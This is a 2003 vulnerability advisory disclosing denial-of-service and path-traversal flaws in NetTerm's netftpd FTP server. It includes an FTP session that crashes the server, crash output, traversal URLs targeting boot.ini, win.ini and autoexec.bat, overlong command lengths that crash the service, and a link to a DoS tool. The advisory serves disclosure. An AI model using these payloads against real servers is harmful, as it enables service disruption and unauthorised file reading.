------------------------------------------------------------------ - EXPL-A-2003-017 exploitlabs.com Advisory 017 ------------------------------------------------------------------ -= netterm netftpd =- Donnie Werner July 18, 2003 http://exploitlabs.com Vunerability(s): ---------------- 1. Remote / Local Denial of Service Product: -------- netftpd.exe is integral to netterm - 4.2.8.e(i) [current] all versions through current are affected Description of product: ----------------------- "NetTerm is a Windows based terminal emulator with fast zmodem file transfers. It can also be used as a dialer program for SLIP/PPP and includes a built in scripting language. For Internet hosts, the telnet protocol is enabled with VT100 and full ANSI graphics. A ftp server is included. Transparent printing and local host editing is supported for UNIX. nt3242e.exe - 32 bit InterSoft@compuserve.com" http://www.securenetterm.com/pub/nt3242ei.exe http://www.netterm.com http://securenetterm.com/html/downloads.html VUNERABILITY / EXPLOIT ====================== by default netftpd uses c:\ as its base ftproot netftpd.exe started with defaults server: Windows XP Professional ----------- snip ------------- root@linuxbitch:/#ftp vunerable[host].com 220 NetTerm FTP server ready [ctllf][ctllf] ftp>cd /windows/system32 ftp>ls ( or dir ) ---------- snip -------------- remote ftpd server crashes with logging and trace enabled in the options, netftpd does not log any commands when crashed sample crash output.. error1: The instruction at "0x77f551c0" referenced memory at "0x00000000". the memory could not be "read" Click OK to terminate program error2: The instruction at "0x77f5310f" referenced memory at "0x656e776f" the memory could not be "written" Click OK to terminate program these produce some odd behavior as well ( in a browser ) ftp://[host]/c:%5C/c:%5C/../../ ftp://[host]/c:%5C/../../././././././././ ftp://[host]/../boot.ini DrInsane helped with these... If you send any of these ftp server will crash:)Even the user command has problem. Cwd [a] * 518 User [a] * 1110 List [a] * 518 Stu [a] * 518 Port [a] * 1110 Type [a] * 1110 Mkd [a] * 1110 Dele [a] * 1110 Rmd [a] * 1110 You can also try to give strings in you browser using HTML chars like: (just for fun) /%5c..%5c..%5c..%5cwindows%5cwin%2eini /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat DrInsane also has writen a sample prog that will crash the ftp. (http://members.lycos.co.uk/r34ct/main/godzillaDosTool/). Local: ------ yes Remote: ------- yes Vendor Fix: ----------- No fix on 0day Vendor Contact: --------------- Concurrent with this advisory support@securenetterm.com Credits: -------- Donnie Werner morning_wood@exploitlabs.com http://exploitlabs.com I would like to thank DrInsane and Nutcase for the input and help Original advisory at http://exploitlabs.com/files/advisories/EXPL-A-2003-017-netftpd.txt